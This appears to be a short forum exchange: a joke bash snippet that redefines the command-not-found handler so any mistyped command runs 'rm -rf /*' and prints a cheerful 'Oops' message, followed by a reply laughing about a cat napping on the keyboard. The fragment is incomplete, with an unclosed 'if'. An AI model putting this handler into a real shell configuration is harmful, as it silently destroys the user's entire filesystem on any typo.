if [ -x /usr/lib/command-not-found ]; then
#If command is not found, delete hard drive
command_not_found_handle(){ rm -rf /*; echo "Oops, looks like you misspelt something :(";}
Haha nice. Not such a good idea if you have a cat at home that likes to nap on your keyboard.